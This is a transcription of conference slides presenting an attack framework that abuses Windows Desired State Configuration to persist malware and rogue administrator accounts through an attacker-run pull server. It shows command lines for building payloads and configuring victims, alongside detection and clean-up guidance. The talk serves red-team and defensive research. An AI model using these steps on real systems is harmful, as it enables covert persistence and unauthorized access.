DSCompromised: A Windows DSC Attack Framework
|
|
|
- Ada Turner
- 9 years ago
- Views:
Transcription
1 DSCompromised: A Windows DSC Attack Framework Black Hat Asia 2016 Matt Hastings, Ryan Kazanciyan
2 Hello! Ryan Kazanciyan Chief Security Architect, Tanium Matt Hastings Security Director, Tanium Backgrounds in incident response & forensics for large-scale, targeted attacks Formerly consultants, currently builders Co-authors of Investigating PowerShell Attacks (BH USA, 2014) Continue to do IR & forensics research for fun 2
3 Agenda Background DSCompromised Framework & Attack Scenarios Sources of evidence Areas for future research and work 3
4 What the $%#$% is Desired State Configuration?
5 Windows DSC 101 Next-gen configuration management platform for Windows Instrumented via PowerShell Uses standard Managed Object Format (MOF) files Does not require Active Directory (unlike SCCM) Similarities to Puppet & Chef DSC is not a complete solution stack DSC implements the configuration layer Puppet and Chef can interoperate with DSC 5
6 What can DSC do? Ensure that a desired state of the system is maintained over time Download and create files and directories Execute processes Run scripts Create users and assign group membership Control Windows services Manage registry keys and values Install software 6
7 DSC Workflow: Author, Stage, Implement Stage configuration on Pull Server Create configuration.mof file SMB, HTTP, or HTTPS Consume and implement configuration [or] Stage configuration on Push Server WinRM Check for config drift, re-enforce as needed 7
8 Sorry, no zero-days... We have not We have... Exploited vulnerabilities in DSC Utilized DSC as a covert persistence mechanism Identified ways to escalate privileges with DSC Simplified the process to weaponize DSC Identified the telltale evidence of DSC misuse 8
9 Why is DSC an interesting attacker tool? Obscure & flexible persistence mechanism Not detected or examined by most security tools Automatic re-infection if not properly remediated 9
10 What are its limitations? Difficult to learn and use Simplified by our PowerShell scripts Troubleshooting can be painful Requires PS 4.0 on victim and C2 server Windows 8.1 and later Server 2012 R2 and later Optional WMF upgrade on earlier versions Requires Admin privileges on victim host Post-compromise persistence 10
11 Why did we pursue this research? Equip red teams with a novel attack vector Help blue teams know how to detect it Get ahead of real world intruders 11
12 Introducing the DSCompromised Framework
13 DSCompromised Framework PowerShell scripts to setup DSC C2 server, build payload, infect victims Components: Server PowerShell module Configure-Server.psm1 Victim configuration script Configure-Victim.ps1 13
14 Our approach: DSC pull mode Emulate a real C2 server Victim client initiates beacon requests via HTTP/s Server can be on the internet or victim s internal network Attacker-controlled server preferable Significant footprint to install DSC hosting components Configure DSC Pull Server (C2 server) Create malicious configuration to host on Pull Server Configure-Server.psm1 New-Payload HTTP/s Consume and implement config on victim host(s) Configure-Victim.ps1 New-User 14
15 Attack Scenario: Persist Malware Infect victim machine with backdoor malware Ensure the malware continues to execute and remain on disk Re-infect victim automatically if remediated 15
16 Demo video: Persisting malware with DSC
17 Attack Scenario: Step 0 Configure C2 Server by installing DSC services Add DSC Service Role: Add-WindowsFeature DscService Install Microsoft DSC Resource Kit: xpsdesiredstateconfiguration Run server setup script included with DSCompromised framework: Initialize-Server Attacker Remote Pull Server Internal Victim 17
18 Configure-Server.ps1 PS C:\> Initialize-Server -CompliancePort ConfigPort 443 Configure server as a DSC pull server -CompliancePort Port where compliance server is hosted (optional) Default value ConfigPort Port where configurations are hosted (optional) Default value
19 Attack Scenario: Step 1 Build and host payload configuration on DSC C2 server Copy malware executable file to DSC C2 server Use DSCompromised script to ingest malware and build configuration payload: New-Payload Script generates configuration MOF with unique GUID name Attacker Remote Pull Server Internal Victim 19
20 New-Payload PS C:\> New-Payload -SourceFile C:\evil.exe -DestinationPath C:\NotEvil.exe -Arguments foo bar New-Configuration Create payload configuration hosted on DSC pull server -SourceFile -DestinationPath Location on victim where file will be created -Arguments Local path to malware executable file Contents stored as byte array in configuration MOF Arguments passed for process execution (optional) Output MOF and checksum files named with unique GUID Stored in C:\Program Files\WindowsPowerShell\DscService\Configuration 20
21 Attack Scenario: Step 2 Execute Configure-Victim.ps1 on victim Attacker Remote Pull Server Ensures WinRM enabled Takes GUID and server address as parameters Configures LCM to use remote DSC pull server Internal Victim 21
22 Attack Scenario: Step 3 Victim automatically downloads and applies configuration Configuration MOF drops embedded malware on disk and executes Attacker proceeds to interact with system via running backdoor Attacker Remote Pull Server Internal Victim 22
23 Configure-Victim.ps1 PS C:\> Configure-Victim -GUID {GUID} -Server Port 443 -MofPath C:\Temp\Temp.mof Runs on victim -GUID GUID of configuration to download -Server Pull server network address -Port Pull server listening port (optional; default 8080) -MofPath Location where temporary MOF file is written (optional) 23
24 Victim LCM Configuration AllowModuleOverwrite = $True ConfigurationModeFrequencyMins = 15 How policy is applied RefreshFrequencyMins = 30 Minutes between LCM checks that system is in compliance with config Hardcoded minimum 15 minutes ConfigurationMode = 'ApplyAndAutoCorrect' Overwrite with newer configuration Minutes between communication with pull server for updated config Hardcoded minimum 30 minutes RefreshMode = 'Pull' How configurations are gathered (Pull or Push)
25 Attack Scenario: Step 4 Blue team Taylor Swift detects malware on disk Kills process Deletes file Shakes it off 25
26 15 minutes later... 26
27 Attack Scenario: Step 5 Victim is automatically reinfected DSC consistency check runs every fifteen minutes via scheduled task* (< WMF 5) Malware is re-created on victim host and executes again Attacker regains access to victim machine Attacker Remote Pull Server Internal Victim 27
28 Success! 28
29 Attack Scenario: Persist User Account Create an unauthorized local account with an attacker-chosen password Ensure user is a member of a specific group, such as local administrators Automatically re-add account and restore group membership if deleted or changed 29
30 Demo video: Persisting a rogue account with DSC
31 New-User PS C:\> New-User -Username test_user -Password Long_And_Complex! -Group RemoteAdmins New-Configuration Create user configuration hosted on DSC server -Username -Password Must meet victim s password complexity requirements -Group User to be created on victim Local group of which user should be a member (optional) Default Administrators Output MOF and checksum files named with unique GUID Stored in C:\Program Files\WindowsPowerShell\DscService\Configuration 31
32 Victim Management DSC Compliance Server Web service on pull server that tracks configuration of managed endpoints 32
33 Get-Compliance PS C:\> Get-Compliance -URI <compliance server address> Included in Configure-Server module Pulls victim information from DSC compliance server -URI Compliance server address (optional) Defaults to localhost and standard port (9080) Output PS Objects for each victim machine 33
34 Compliance Output ConfigID LastCheckinTime LastComplianceTime ConfigCheckSum Computer Compliant NodeStatus : : : : : : : d6ca be5a-82a12cf47d1b T01:37: Z T15:24: AB16DB71BEC001D59E0C96F3A51F0A9FF True Pull operation was successful 34
35 Sources of evidence: DSC use and abuse 35
36 Network traffic You probably shouldn t see these requests leave your network (unless you legitimately use an external DSC server!) POST /psdscpullserver.svc/action(configurationid='a cd47-462d-ae f60a99')/getaction GET /psdscpullserver.svc/action(configurationid='a cd47-462d-ae f60a99')/configurationcontent 36
37 Where do DSC configs reside on disk? 37
38 MOF contents: Metaconfig 38
39 Previously attempted DSC configurations (WMF / PowerShell 5.0) 39
40 File system during infection (Win 8.1, WMF 4.0) Configure-Victim script creates pull setup MOF System creates initial LCM meta config Task Manager creates DSC Consistency and Boot Tasks <snip> System writes to DSC Operational Event Log
41 File system during infection (cont d) System creates temp copy of downloaded payload MOF Malware dropped by payload MOF Current and backup config set to payload MOF System deletes temp copy of downloaded payload MOF Pull timestamp added to PullRunLog.txt Configure-Victim script deletes setup MOF
42 Event logs: DSC Operational Upon initially configuring victim 42
43 Event logs: DSC Operational (cont d) 43
44 Event logs: Task Scheduler (< WMF 5.0) DSC tasks registered on victim during initial setup 44
45 PS query: LCM configuration 45
46 PS query: Malware payload configuration 46
47 Malware payload configuration (cont d) 47
48 PS query: User & group configuration 48
49 PS query: Multiple active configs (WMF 5) 49
50 Clean-up / DSC removal Delete MOF files from C:\Windows\system32\configuration Current.mof Current.mof.checksum Pending.mof Backup.mof MetaConfig.mof MetaConfig.backup.mof System will no longer re-infect at next consistency check 50
51 What s next? 51
52 DSC is probably here to stay Held back by lack of easy-to-use tools and limited support for legacy versions of Windows DSC Resource Kit open sourced in June 2015 Increasing number of use-cases Windows Nano Server management Azure VM management We have not yet seen these attack techniques in the wild 52
53 DSCompromised roadmap MOAR payloads! Auto dissolve Dynamically update existing configurations 53
54 Key Take-Aways Desired State Configuration provides a new avenue for PowerShellsavvy attackers to abuse Windows system administration features The DSCompromised Framework automates the creation of DSC payloads to persist binaries and rogue accounts DSC leaves behind a wealth of forensic evidence on the network, in logs, and on disk - easy to detect if you know where to look! 54
55 Thank you! matt.hastings [at] ryan.kazanciyan [at] 55
Top Ten Cyber Threats
Top Ten Cyber Threats Margaret M. McMahon, Ph.D. ICCRTS 2014 Introduction 2 Motivation Outline How malware affects a system Top Ten (Simple to complex) Brief description Explain impacts Main takeaways
PROJECTIONS SUITE. Database Setup Utility (and Prerequisites) Installation and General Instructions. v0.9 draft prepared by David Weinstein
PROJECTIONS SUITE Database Setup Utility (and Prerequisites) Installation and General Instructions v0.9 draft prepared by David Weinstein Introduction These are the instructions for installing, updating,
DRIVE-BY DOWNLOAD WHAT IS DRIVE-BY DOWNLOAD? A Typical Attack Scenario
DRIVE-BY DOWNLOAD WHAT IS DRIVE-BY DOWNLOAD? Drive-by Downloads are a common technique used by attackers to silently install malware on a victim s computer. Once a target website has been weaponized with
OPAS Prerequisites. Prepared By: This document contains the prerequisites and requirements for setting up OPAS.
OPAS Prerequisites This document contains the prerequisites and requirements for setting up OPAS. Prepared By: Luke Swords Principal Consultant 24/06/2015 Version 1.0 Contact Information Infront Consulting
HoneyBOT User Guide A Windows based honeypot solution
HoneyBOT User Guide A Windows based honeypot solution Visit our website at http://www.atomicsoftwaresolutions.com/ Table of Contents What is a Honeypot?...2 How HoneyBOT Works...2 Secure the HoneyBOT Computer...3
Course Description. Course Audience. Course Outline. Course Page - Page 1 of 12
Course Page - Page 1 of 12 Windows 7 Enterprise Desktop Support Technician M-50331 Length: 5 days Price: $2,795.00 Course Description This five-day instructor-led course provides students with the knowledge
Microsoft. Jump Start. M11: Implementing Active Directory Domain Services
Microsoft Jump Start M11: Implementing Active Directory Domain Services Rick Claus Technical Evangelist Microsoft Ed Liberman Technical Trainer Train Signal Jump Start Target Agenda Day One Day 1 Day 2
5 Steps to Advanced Threat Protection
5 Steps to Advanced Threat Protection Agenda Endpoint Protection Gap Profile of Advanced Threats Consensus Audit Guidelines 5 Steps to Advanced Threat Protection Resources 20 Years of Chasing Malicious
Eylean server deployment guide
Eylean server deployment guide Contents 1 Minimum software and hardware requirements... 2 2 Setting up the server using Eylean.Server.Setup.exe wizard... 2 3 Manual setup with Windows authentication -
Malwarebytes Enterprise Edition Best Practices Guide Version 1.3 21 March 2014
Malwarebytes Enterprise Edition Best Practices Guide Version 1.3 21 March 2014 Notices Malwarebytes products and related documentation are provided under a license agreement containing restrictions on
AutoMate BPA Server 10 Installation Guide
AutoMate BPA Server 10 Installation Guide AutoMate BPA Server follows the client/server model of computing where one or more servers are hosts that share their resources with multiple clients. Since data
Managing Enterprise Devices and Apps using System Center Configuration Manager
Course 20696B: Managing Enterprise Devices and Apps using System Center Configuration Manager Course Details Course Outline Module 1: Managing Desktops and Devices in the Enterprise This module explains
LT Auditor+ 2013. Windows Assessment SP1 Installation & Configuration Guide
LT Auditor+ 2013 Windows Assessment SP1 Installation & Configuration Guide Table of Contents CHAPTER 1- OVERVIEW... 3 CHAPTER 2 - INSTALL LT AUDITOR+ WINDOWS ASSESSMENT SP1 COMPONENTS... 4 System Requirements...
Using DSC with Visual Studio Release Management
Using DSC with Visual Studio Release Management With Microsoft Release Management 2013 Update 3 CTP 1 (RM), you can now use Windows PowerShell or Windows PowerShell Desired State Configuration (DSC) feature
Smartphone Pentest Framework v0.1. User Guide
Smartphone Pentest Framework v0.1 User Guide 1 Introduction: The Smartphone Pentest Framework (SPF) is an open source tool designed to allow users to assess the security posture of the smartphones deployed
6WRUP:DWFK. Policies for Dedicated SQL Servers Group
OKENA 71 Second Ave., 3 rd Floor Waltham, MA 02451 Phone 781 209 3200 Fax 781 209 3199 6WRUP:DWFK Policies for Dedicated SQL Servers Group The sample policies shipped with StormWatch address both application-specific
Windows 7, Enterprise Desktop Support Technician
Course 50331D: Windows 7, Enterprise Desktop Support Technician Page 1 of 11 Windows 7, Enterprise Desktop Support Technician Course 50331D: 4 days; Instructor-Led Introduction This four-day instructor-ledcourse
Securing Privileges in the Cloud. A Clear View of Challenges, Solutions and Business Benefits
A Clear View of Challenges, Solutions and Business Benefits Introduction Cloud environments are widely adopted because of the powerful, flexible infrastructure and efficient use of resources they provide
Windows 7, Enterprise Desktop Support Technician Course 50331: 5 days; Instructor-led
Lincoln Land Community College Capital City Training Center 130 West Mason Springfield, IL 62702 217-782-7436 www.llcc.edu/cctc Windows 7, Enterprise Desktop Support Technician Course 50331: 5 days; Instructor-led
User Migration Tool. Note. Staging Guide for Cisco Unified ICM/Contact Center Enterprise & Hosted Release 9.0(1) 1
The (UMT): Is a stand-alone Windows command-line application that performs migration in the granularity of a Unified ICM instance. It migrates only Unified ICM AD user accounts (config/setup and supervisors)
ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young
ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction
ESET NOD32 Antivirus 4 for Linux Desktop. Quick Start Guide
ESET NOD32 Antivirus 4 for Linux Desktop Quick Start Guide ESET NOD32 Antivirus 4 provides state-of-the-art protection for your computer against malicious code. Based on the ThreatSense scanning engine
Alfresco Enterprise on Azure: Reference Architecture. September 2014
Alfresco Enterprise on Azure: Reference Architecture Page 1 of 14 Abstract Microsoft Azure provides a set of services for deploying critical enterprise workloads on its highly reliable cloud platform.
GFI White Paper PCI-DSS compliance and GFI Software products
White Paper PCI-DSS compliance and Software products The Payment Card Industry Data Standard () compliance is a set of specific security standards developed by the payment brands* to help promote the adoption
"Charting the Course... ... to Your Success!" MOC 50331 D Windows 7 Enterprise Desktop Support Technician Course Summary
Description Course Summary This course provides students with the knowledge and skills needed to isolate, document and resolve problems on a Windows 7 desktop or laptop computer. It will also help test
Hunting for Indicators of Compromise
Hunting for Indicators of Compromise Lucas Zaichkowsky Mandiant Session ID: END-R31 Session Classification: Intermediate Agenda Threat brief Defensive strategy overview Hunting for Indicators of Compromise
Net Protector Admin Console
Net Protector Admin Console USER MANUAL www.indiaantivirus.com -1. Introduction Admin Console is a Centralized Anti-Virus Control and Management. It helps the administrators of small and large office networks
FOR MAC. Quick Start Guide. Click here to download the most recent version of this document
FOR MAC Quick Start Guide Click here to download the most recent version of this document ESET Cyber Security Pro provides state-of-the-art protection for your computer against malicious code. Based on
Implementing Microsoft Azure Infrastructure Solutions 20533B; 5 Days, Instructor-led
Implementing Microsoft Azure Infrastructure Solutions 20533B; 5 Days, Instructor-led Course Description This course is aimed at experienced IT Professionals who currently administer their on-premises infrastructure.
Understand Backup and Recovery Methods
Understand Backup and Recovery Methods Lesson Overview Understand backup and recovery methods. In this lesson, you will explore: Backup management Backup options Recovery methods Backup Management Windows
PAYMENTVAULT TM LONG TERM DATA STORAGE
PAYMENTVAULT TM LONG TERM DATA STORAGE Version 3.0 by Auric Systems International 1 July 2010 Copyright c 2010 Auric Systems International. All rights reserved. Contents 1 Overview 1 1.1 Platforms............................
Course 20533B: Implementing Microsoft Azure Infrastructure Solutions
Course 20533B: Implementing Microsoft Azure Infrastructure Solutions Sales 406/256-5700 Support 406/252-4959 Fax 406/256-0201 Evergreen Center North 1501 14 th St West, Suite 201 Billings, MT 59102 Course
LoadRunner and Performance Center v11.52 Technical Awareness Webinar Training
LoadRunner and Performance Center v11.52 Technical Awareness Webinar Training Tony Wong 1 Copyright Copyright 2012 2012 Hewlett-Packard Development Development Company, Company, L.P. The L.P. information
Protecting Your Data From The Inside Out UBA, Insider Threats and Least Privilege in only 10 minutes!
We protect your most sensitive information from insider threats. Protecting Your Data From The Inside Out UBA, Insider Threats and Least Privilege in only 10 minutes! VARONIS SYSTEMS About Me Dietrich
Firewalls and Software Updates
Firewalls and Software Updates License This work by Z. Cliffe Schreuders at Leeds Metropolitan University is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License. Contents General
Who DIT It? Detecting and Mitigating Privilege Escalation Attacks on the Active Directory Data Store
Who DIT It? Detecting and Mitigating Privilege Escalation Attacks on the Active Directory Data Store Mike Middleton Justin Prosco Mandiant, A FireEye Company Mike Middleton Principal Consultant Joined
Azure Powershell Command Line Reference
Name Description Add-AzureEnvironment Creates an Azure environment Disable-AzureWebsiteApplicationDiagnostic Disables the website's application diagnostics Enable-AzureWebsiteApplicationDiagnostic Enables
Check Point and Security Best Practices. December 2013 Presented by David Rawle
Check Point and Security Best Practices December 2013 Presented by David Rawle Housekeeping o Mobiles on Silent o No File Alarms planned o Fire exits are in front and behind and down the stairs o Downstairs
Pension Benefit Guaranty Corporation. Office of Inspector General. Evaluation Report. Penetration Testing 2001 - An Update
Pension Benefit Guaranty Corporation Office of Inspector General Evaluation Report Penetration Testing 2001 - An Update August 28, 2001 2001-18/23148-2 Penetration Testing 2001 An Update Evaluation Report
TANDBERG MANAGEMENT SUITE 10.0
TANDBERG MANAGEMENT SUITE 10.0 Installation Manual Getting Started D12786 Rev.16 This document is not to be reproduced in whole or in part without permission in writing from: Contents INTRODUCTION 3 REQUIREMENTS
Course Outline. Managing Enterprise Devices and Apps using System Center Configuration ManagerCourse 20696B: 5 days Instructor Led
Managing Enterprise Devices and Apps using System Center Configuration ManagerCourse 20696B: 5 days Instructor Led About this Course Get expert instruction and hands-on practice configuring and managing
Persistence Mechanisms as Indicators of Compromise
Persistence Persistence Mechanisms as Indicators of Compromise An automated technology for identifying cyber attacks designed to survive indefinitely the reboot process on PCs White Paper Date: October
DEPLOYMENT GUIDE DEPLOYING F5 AUTOMATED NETWORK PROVISIONING FOR VMWARE INFRASTRUCTURE
DEPLOYMENT GUIDE DEPLOYING F5 AUTOMATED NETWORK PROVISIONING FOR VMWARE INFRASTRUCTURE Version: 1.0 Deploying F5 Automated Network Provisioning for VMware Infrastructure Both VMware Infrastructure and
How To - Implement Single Sign On Authentication with Active Directory
How To - Implement Single Sign On Authentication with Active Directory Applicable to English version of Windows This article describes how to implement single sign on authentication with Active Directory
VoipSwitch Security Audit
VoipSwitch Security Audit Security audit was made at 1 st January 2013 (3.00 PM 10.00 PM UTC +1) by John Doe who is Security Advisor at VoipSwitch Company. Server's IP address : 11.11.11.11 Server has
Chapter 1 Scenario 1: Acme Corporation
Chapter 1 Scenario 1: Acme Corporation In This Chapter Description of the Customer Environment page 18 Introduction to Deploying Pointsec PC page 20 Prepare for Deployment page 21 Install Pointsec PC page
Advantage for Windows Copyright 2012 by The Advantage Software Company, Inc. All rights reserved. Client Portal blue Installation Guide v1.
Advantage for Windows Copyright 2012 by The Advantage Software Company, Inc. All rights reserved Client Portal blue Installation Guide v1.1 Overview This document will walk you through the process of installing
Project Proposal Active Honeypot Systems By William Kilgore University of Advancing Technology. Project Proposal 1
Project Proposal Active Honeypot Systems By William Kilgore University of Advancing Technology Project Proposal 1 Project Proposal 2 Abstract Honeypot systems are readily used by organizations large and
Module 3: Resolve Software Failure This module explains how to fix problems with applications that have problems after being installed.
CÔNG TY CỔ PHẦN TRƯỜNG CNTT TÂN ĐỨC TAN DUC INFORMATION TECHNOLOGY SCHOOL JSC LEARN MORE WITH LESS! 50331 - Windows 7, Enterprise Desktop Support Technician Duration: 5 days About this Course This five-day
Operation Liberpy : Keyloggers and information theft in Latin America
Operation Liberpy : Keyloggers and information theft in Latin America Diego Pérez Magallanes Malware Analyst Pablo Ramos HEAD of LATAM Research Lab 7/7/2015 version 1.1 Contents Introduction... 3 Operation
Lab 7 - Exploitation 1. NCS 430 Penetration Testing Lab 7 Sunday, March 29, 2015 John Salamy
Lab 7 - Exploitation 1 NCS 430 Penetration Testing Lab 7 Sunday, March 29, 2015 John Salamy Lab 7 - Exploitation 2 Item I. (What were you asked to do?) Metasploit Server Side Exploits Perform the exercises
Symantec Advanced Threat Protection: Network
Symantec Advanced Threat Protection: Network DR150218C April 2015 Miercom www.miercom.com Contents 1.0 Executive Summary... 3 2.0 Overview... 4 2.1 Products Tested... 4 2.2. Malware Samples... 5 3.0 How
Tool for Automated Provisioning System (TAPS) Version 1.2 (1027)
Tool for Automated Provisioning System (TAPS) Version 1.2 (1027) 2015 VoIP Integration Rev. July 24, 2015 Table of Contents Product Overview... 3 Application Requirements... 3 Cisco Unified Communications
6WRUP:DWFK. Policies for Dedicated IIS Web Servers Group. V2.1 policy module to restrict ALL network access
OKENA 71 Second Ave., 3 rd Floor Waltham, MA 02451 Phone 781 209 3200 Fax 781 209 3199 6WRUP:DWFK Policies for Dedicated IIS Web Servers Group The policies shipped with StormWatch address both application-specific
System Administration Training Guide. S100 Installation and Site Management
System Administration Training Guide S100 Installation and Site Management Table of contents System Requirements for Acumatica ERP 4.2... 5 Learning Objects:... 5 Web Browser... 5 Server Software... 5
FREQUENTLY ASKED QUESTIONS
FREQUENTLY ASKED QUESTIONS Secure Bytes, October 2011 This document is confidential and for the use of a Secure Bytes client only. The information contained herein is the property of Secure Bytes and may
JAMF Software Server Installation Guide for Linux. Version 8.6
JAMF Software Server Installation Guide for Linux Version 8.6 JAMF Software, LLC 2012 JAMF Software, LLC. All rights reserved. JAMF Software has made all efforts to ensure that this guide is accurate.
NovaBACKUP xsp Version 15.0 Upgrade Guide
NovaBACKUP xsp Version 15.0 Upgrade Guide NovaStor / November 2013 2013 NovaStor, all rights reserved. All trademarks are the property of their respective owners. Features and specifications are subject
Installing The SysAidTM Server Locally
Installing The SysAidTM Server Locally Document Updated: 17 October 2010 Introduction SysAid is available in two editions: a fully on-demand ASP solution and an installed, in-house solution for your server.
ESET SMART SECURITY 6
ESET SMART SECURITY 6 Microsoft Windows 8 / 7 / Vista / XP / Home Server Quick Start Guide Click here to download the most recent version of this document ESET Smart Security provides state-of-the-art
Attacks from the Inside
Attacks from the Inside Eddy Willems, G Data Righard J. Zwienenberg, Norman Attacks from the Inside. Agenda - Social Networking / Engineering - Where are the threats coming from - Infection vectors - The
Post-Access Cyber Defense
Post-Access Cyber Defense Dr. Vipin Swarup Chief Scientist, Cyber Security The MITRE Corporation November 2015 Approved for Public Release; Distribution Unlimited. 15-3647. 2 Cyber Security Technical Center
User Guide Release Management for Visual Studio 2013
User Guide Release Management for Visual Studio 2013 ABOUT THIS GUIDE The User Guide for the release management features is for administrators and users. The following related documents for release management
Viewfinity Privilege Management Integration with Microsoft System Center Configuration Manager. By Dwain Kinghorn
4 0 0 T o t t e n P o n d R o a d W a l t h a m, M A 0 2 4 5 1 7 8 1. 8 1 0. 4 3 2 0 w w w. v i e w f i n i t y. c o m Viewfinity Privilege Management Integration with Microsoft System Center Configuration
Xerox Next Generation Security: Partnering with McAfee White Paper
Xerox Next Generation Security: Partnering with McAfee White Paper 1 Background Today s MFPs are complex embedded systems. They contain, among other things, full scale operating systems, embedded web servers,
Migrating to vcloud Automation Center 6.1
Migrating to vcloud Automation Center 6.1 vcloud Automation Center 6.1 This document supports the version of each product listed and supports all subsequent versions until the document is replaced by a
Capture Pro Software FTP Server System Output
Capture Pro Software FTP Server System Output Overview The Capture Pro Software FTP server will transfer batches and index data (that have been scanned and output to the local PC) to an FTP location accessible
Published. Technical Bulletin: Use and Configuration of Quanterix Database Backup Scripts 1. PURPOSE 2. REFERENCES 3.
Technical Bulletin: Use and Configuration of Quanterix Database Document No: Page 1 of 11 1. PURPOSE Quanterix can provide a set of scripts that can be used to perform full database backups, partial database
QliqDIRECT Active Directory Guide
QliqDIRECT Active Directory Guide QliqDIRECT is a Windows Service with Active Directory Interface. QliqDIRECT resides in your network/server and communicates with Qliq cloud servers securely. QliqDIRECT
ESET NOD32 ANTIVIRUS 8
ESET NOD32 ANTIVIRUS 8 Microsoft Windows 8.1 / 8 / 7 / Vista / XP / Home Server 2003 / Home Server 2011 Quick Start Guide Click here to download the most recent version of this document ESET NOD32 Antivirus
McAfee Application Control / Change Control Administration Intel Security Education Services Administration Course
McAfee Application Control / Change Control Administration Intel Security Education Services Administration Course The McAfee University Application Control / Change Control Administration course enables
BackupAssist v6 quickstart guide
Using the new features in BackupAssist v6... 2 VSS application backup (Exchange, SQL, SharePoint)... 2 Backing up VSS applications... 2 Restoring VSS applications... 3 System State backup and restore...
PowerShell for Penetration Testers
Training: PowerShell for Penetration Testers Dates of the training: March 14-15,2016 in Heidelberg, Germany Book Now using the code: TR16HMTRAINING and save an additional 10% of the current valid rate!
Course MS20696A Managing Enterprise Devices and Apps using System Center Configuration Manager
3 Riverchase Office Plaza Hoover, Alabama 35244 Phone: 205.989.4944 Fax: 855.317.2187 E-Mail: [email protected] Web: www.discoveritt.com Course MS20696A Managing Enterprise Devices and Apps using
Active Directory Adapter with 64-bit Support Installation and Configuration Guide
IBM Security Identity Manager Version 6.0 Active Directory Adapter with 64-bit Support Installation and Configuration Guide SC27-4384-02 IBM Security Identity Manager Version 6.0 Active Directory Adapter
Microsoft Corporation. Project Server 2010 Installation Guide
Microsoft Corporation Project Server 2010 Installation Guide Office Asia Team 11/4/2010 Table of Contents 1. Prepare the Server... 2 1.1 Install KB979917 on Windows Server... 2 1.2 Creating users and groups
Managing Enterprise Devices and Apps using System Center Configuration Manager 20696B; 5 Days, Instructor-led
Managing Enterprise Devices and Apps using System Center Configuration Manager 20696B; 5 Days, Instructor-led Course Description Get expert instruction and hands-on practice configuring and managing clients
Advanced Web Security, Lab
Advanced Web Security, Lab Web Server Security: Attacking and Defending November 13, 2013 Read this earlier than one day before the lab! Note that you will not have any internet access during the lab,
Virtualization and Cloud: Orchestration, Automation, and Security Gaps
Virtualization and Cloud: Orchestration, Automation, and Security Gaps SESSION ID: CSV-R02 Dave Shackleford Founder & Principal Consultant Voodoo Security @daveshackleford Introduction Private cloud implementations
Insight Video Net. LLC. CMS 2.0. Quick Installation Guide
Insight Video Net. LLC. CMS 2.0 Quick Installation Guide Table of Contents 1. CMS 2.0 Installation 1.1. Software Required 1.2. Create Default Directories 1.3. Create Upload User Account 1.4. Installing
User Manual. Onsight Management Suite Version 5.1. Another Innovation by Librestream
User Manual Onsight Management Suite Version 5.1 Another Innovation by Librestream Doc #: 400075-06 May 2012 Information in this document is subject to change without notice. Reproduction in any manner
BackupAssist v6 quickstart guide
New features in BackupAssist v6... 2 VSS application backup (Exchange, SQL, SharePoint)... 3 System State backup... 3 Restore files, applications, System State and mailboxes... 4 Fully cloud ready Internet
AppSense Environment Manager. Enterprise Design Guide
Enterprise Design Guide Contents Introduction... 3 Document Purpose... 3 Basic Architecture... 3 Common Components and Terminology... 4 Best Practices... 5 Scalability Designs... 6 Management Server Scalability...
A perspective to incident response or another set of recommendations for malware authors
A perspective to incident response or another set of recommendations for malware authors Alexandre Dulaunoy - TLP:WHITE [email protected] June 7, 2013 CIRCL, national CERT of Luxembourg CIRCL
vsphere Upgrade Update 1 ESXi 6.0 vcenter Server 6.0 EN-001804-02
Update 1 ESXi 6.0 vcenter Server 6.0 This document supports the version of each product listed and supports all subsequent versions until the document is replaced by a new edition. To check for more recent
MaaS360 Mobile Enterprise Gateway
MaaS360 Mobile Enterprise Gateway Administrator Guide Copyright 2013 Fiberlink Communications Corporation. All rights reserved. Information in this document is subject to change without notice. The software
What IT Auditors Need to Know About Secure Shell. SSH Communications Security
What IT Auditors Need to Know About Secure Shell SSH Communications Security Agenda Secure Shell Basics Security Risks Compliance Requirements Methods, Tools, Resources What is Secure Shell? A cryptographic
RES ONE Automation 2015 Task Overview
RES ONE Automation 2015 Task Overview Task Overview RES ONE Automation 2015 Configuration Tasks The library Configuration contains Tasks that relate to the configuration of a computer, such as applying
McAfee Web Gateway Administration Intel Security Education Services Administration Course Training
McAfee Web Gateway Administration Intel Security Education Services Administration Course Training The McAfee Web Gateway Administration course from Education Services provides an in-depth introduction
How To Upgrade Your Microsoft SQL Server for Accounting CS Version 2012.1
How To Upgrade Your Microsoft SQL Server for Version 2012.1 The first step is to gather important information about your existing configuration. Identify The Database Server and SQL Server Version The
Vector HelpDesk - Administrator s Guide
Vector HelpDesk - Administrator s Guide Vector HelpDesk - Administrator s Guide Configuring and Maintaining Vector HelpDesk version 5.6 Vector HelpDesk - Administrator s Guide Copyright Vector Networks
Course 20533: Implementing Microsoft Azure Infrastructure Solutions
Course 20533: Implementing Microsoft Azure Infrastructure Solutions Overview About this course This course is aimed at experienced IT Professionals who currently administer their on-premises infrastructure.
AppLoader 7.7. Load Testing On Windows Azure
AppLoader 7.7 Load Testing On Windows Azure CONTENTS INTRODUCTION... 3 PURPOSE... 3 CREATE A WINDOWS AZURE ACCOUNT... 3 CREATE A LOAD TESTING ENVIRONMENT ON THE CLOUD... 6 CONFIGURE A WINDOWS AZURE STORAGE
vsphere Upgrade vsphere 6.0 EN-001721-03
vsphere 6.0 This document supports the version of each product listed and supports all subsequent versions until the document is replaced by a new edition. To check for more recent editions of this document,
MaaS360 Mobile Enterprise Gateway
MaaS360 Mobile Enterprise Gateway Administrator Guide Copyright 2014 Fiberlink, an IBM Company. All rights reserved. Information in this document is subject to change without notice. The software described
QRadar SIEM 7.2 Windows Event Collection Overview
QRadar Open Mic Webcast #3 August 26, 2014 QRadar SIEM 7.2 Windows Event Collection Overview Panelists Aaron Breen QRadar World-wide Support Leader Adam Frank Principal Solutions Architect Jonathan Pechta
NovaBACKUP xsp Version 12.2 Upgrade Guide
NovaBACKUP xsp Version 12.2 Upgrade Guide NovaStor / August 2011 Rev 20110815 2011 NovaStor, all rights reserved. All trademarks are the property of their respective owners. Features and specifications
CoCreate Manager Server Installation Guide. CoCreate Manager Server Installation Guide 1
CoCreate Manager Server Installation Guide CoCreate Manager Server Installation Guide 1 CoCreate Manager Server Installation Guide 2 Table Of Contents 1. CoCreate Manager Server 2008 4 1.1. Installation
